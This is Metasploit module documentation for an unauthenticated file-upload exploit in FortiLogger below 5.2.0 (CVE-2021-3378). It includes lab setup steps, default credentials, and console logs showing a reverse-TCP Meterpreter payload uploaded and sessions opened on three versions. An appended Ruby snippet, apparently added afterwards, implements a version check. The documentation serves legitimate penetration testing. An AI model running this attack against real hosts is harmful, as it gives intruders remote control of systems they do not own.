metasploit-gs/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md

Vulnerable Application

FortiLogger is web-based logging and reporting software designed specifically for FortiGate firewalls and running on Windows operating systems. It provides features such as instant status tracking, logging, search/filtering, reporting and hotspot management.

This module exploits an unauthenticated arbitrary file upload in FortiLogger < 5.2.0: the company logo upload used by the hotspot settings accepts an insecure POST request without authentication. This exploit may not work if the host has been rebooted, though in that case it fails gracefully.

You can download the installation files from https://www.fortilogger.com/download.

The vendor has removed version 4.4.2.2 from its download page. You can download version 4.4.2.2 from https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip

Tested versions:

  • 4.4.2.2
  • 3.6.2.9
  • 3.4.1.7

Prerequisites

  1. Start a Windows VM (tested on Windows 10 Enterprise).
  2. Install a vulnerable version of FortiLogger (any version lower than 5.2.0) from the URL above.
  3. After installation, verify that the server is working by visiting it with a browser.
    • Default port: 5000
    • Default credentials (username:password): admin:admin

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/http/fortilogger_arbitrary_fileupload
  4. Set RHOSTS
  5. Do: run or exploit
  6. Verify that the message "The target is vulnerable. FortiLogger version [version number]" appears
  7. Verify that the payload was uploaded to the target system successfully: "Payload has been uploaded"
  8. Verify that you get a Meterpreter session

Scenarios

msf6 > use exploit/windows/http/fortilogger_arbitrary_fileupload 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options 

Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.43     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the FortiLogger
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.46     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   FortiLogger < 5.2.0

Version 4.4.2.2

msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. FortiLogger version 4.4.2.2
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.43
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.43:49771) at 2021-03-02 14:05:53 +0300

meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > 

Version 3.6.2.9

msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. FortiLogger version 3.6.2.9
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.43
[*] Meterpreter session 2 opened (192.168.1.46:4444 -> 192.168.1.43:49764) at 2021-03-02 14:17:59 +0300

meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > 

Version 3.4.1.7

msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. FortiLogger version 3.4.1.7
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.43
[*] Meterpreter session 3 opened (192.168.1.46:4444 -> 192.168.1.43:49791) at 2021-03-02 14:39:04 +0300

meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > 

If the target is not accessible

msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: unreachable: No response from server
[*] Exploit completed, but no session was created.

If the target has version 5.2.0 or newer

msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: unexpected-reply: The target may have been updated
[*] Exploit completed, but no session was created.
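The three check outcomes shown above (vulnerable below 5.2.0, "may have been updated" at 5.2.0 or newer, and no response from the server) come down to one version comparison. The Ruby below is an added illustration, not the module's own code, of how that comparison should be done so that an asset inventory or patch-verification script does not misclassify hosts; the regex for locating the version string and the sample response bodies are assumptions, not FortiLogger's real response format.

```ruby
# Added example (not the Metasploit module's code): version-based check for
# FortiLogger < 5.2.0. Response bodies passed in are constructed sample data;
# the version regex is an assumption about where the version appears.
require 'rubygems' # provides Gem::Version for numeric version comparison

FIXED_VERSION = Gem::Version.new('5.2.0')

# Pull a dotted version number out of a response body (assumed format).
def extract_version(body)
  return nil if body.nil?
  m = body.match(/FortiLogger\s+v?(\d+(?:\.\d+)+)/i)
  m && m[1]
end

# Returns [code, message]; the symbols stand in for Msf::Exploit::CheckCode.
# nil/empty body  -> :unknown   (no response from server)
# version < 5.2.0 -> :vulnerable
# otherwise       -> :safe      (the target may have been updated)
def check_fortilogger(body)
  return [:unknown, 'No response from server'] if body.nil? || body.empty?
  ver = extract_version(body)
  return [:unknown, 'Could not determine FortiLogger version'] unless ver
  if Gem::Version.new(ver) < FIXED_VERSION
    [:vulnerable, "The target is vulnerable. FortiLogger version #{ver}"]
  else
    [:safe, "The target may have been updated (FortiLogger version #{ver})"]
  end
end

# Common mistake: comparing version strings lexicographically. '10.0.0' < '5.2.0'
# is true as strings, so a patched host would be reported as vulnerable.
def naive_is_vulnerable?(ver)
  ver < '5.2.0'
end

if __FILE__ == $PROGRAM_NAME
  ['FortiLogger 4.4.2.2', 'FortiLogger 5.2.0', 'FortiLogger 10.0.0', nil].each do |body|
    code, msg = check_fortilogger(body)
    puts "#{code}: #{msg}"
  end
end
```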

Reference

  1. https://erberkan.github.io/2021/cve-2021-3378/